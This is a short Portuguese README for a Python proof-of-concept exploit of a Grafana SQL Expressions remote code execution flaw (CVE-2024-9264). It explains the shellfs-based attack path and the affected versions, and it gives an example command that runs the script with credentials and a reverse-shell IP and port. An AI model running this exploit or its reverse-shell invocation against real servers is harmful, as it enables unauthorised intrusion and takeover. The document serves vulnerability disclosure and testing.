
Prova de conceito em Python para execução remota de código no Grafana via Expressões SQL, explorando a sanitização insuficiente de entrada para executar comandos arbitrários de shell em alvos autenticados.
Prova de Conceito para Execução Remota de Código no Grafana (CVE-2024-9264)
Este repositório contém um script Python que explora uma vulnerabilidade de Execução Remota de Código (RCE) no recurso de Expressões SQL do Grafana. Ao aproveitar a sanitização insuficiente de entrada, este exploit permite que um atacante execute comandos arbitrários de shell no servidor. Isso é possível através da extensão comunitária shellfs, que pode ser instalada e carregada por um atacante para facilitar a execução de comandos.
Viewer ou superioresGrafana >= v11.0.0 (todas as v11.x.y são afetadas)
python3 poc.py [--url <target>] [--username <username>] [--password <password>] [--reverse-ip <IP>] [--reverse-port <PORT>]

python poc.py --url http://127.0.0.1:3000 --username eviluser --password eviluser --reverse-ip 10.10.1.41 --reverse-port 9001
Este script é destinado a fins educacionais e para uso em ambientes controlados onde você tem permissão para testar a segurança do sistema. O uso indevido desta ferramenta pode levar a consequências legais.